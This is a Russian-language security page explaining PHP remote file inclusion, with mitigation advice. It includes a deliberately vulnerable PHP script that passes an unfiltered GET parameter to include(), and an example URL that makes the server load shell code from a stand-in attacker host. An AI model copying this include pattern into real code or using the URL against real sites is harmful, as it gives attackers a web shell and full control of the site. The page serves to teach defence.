PHP include
Критическая уязвимость кода сайта. Максимальный уровень угрозы.
Информация на данной странице актуальна на сегодня - 20.04.2026
PHP include - удаленное включение PHP файла
PHP include является максимальной угрозой класса А1 по классификации OWASP
За последнее время эту страницу посетили 1902 посетителей
PHP include является RFI (Remote file include) уязвимостью для сайтов, созданных на PHP.
PHP include - это одна из самых грозных уязвимостей для сайта, созданного на PHP.
Эксплуатация PHP include представляет максимальную угрозу для атакуемого сайта, и во всех случаях приводит к его взлому
Возможность включения и выполнения удаленного PHP файла - в 100% случаев приводит к взлому сайта, так как обеспечивает получение веб-шелла на атакуемом сервере.
Возможность эксплуатации PHP include возникает из-за грубейших ошибок разработки сайта, отсутствия фильтрации передающих параметров, использование небезопасных функция и приемов программирования.
Пример уязвимого PHP скрипта (RFI PHP include):
Форма Файла http://vulnserver.com/vuln.html
<form метод="GET">
<select name="color">
<option color="red">красный</option>
<option color="blue">синий</option>
</select>
<input type="submit">
</form>Файл http://vulnserver.com/vuln.php
<?
$color = "blue";
if (isset( $_GET[color] ) )
{
$color = $_GET[color];
include( $color . '.php' );
} ?>Вызов скрипта:
http://vulnserver.com/vuln.php?color=http://devil_site.com/shellcode.phpРезультат:
Выполнение веб-шелла на атакуемом сервере.
Разработчик сайта предполагает в качестве опции использовать только свои файлы blue.php и red.php
Злоумышленник, воспользовавшись уязвимостью в коде сайта, выполняет свой файл (шелл - код) на сервере жертвы, со своего сервера, получая полный доступ к атакуемому сайту.
Уязвимость PHP include на сайте - это максимальная угроза для его безопасности.
За последнее время эту страницу посетили 1903 посетителей
Защита от PHP include
Фильтрация параметров, передающих данные в eval(); assert(); include(); include_once(); require(); require_once(), create_function(), preg_replace() и т.д.
Отключение директивы allow_url_include в конфигурации php (если это возможно, и не нарушает работу сайта).
Проверка валидности запросов, серверного пути. Использование суперглобального массива $_SERVER.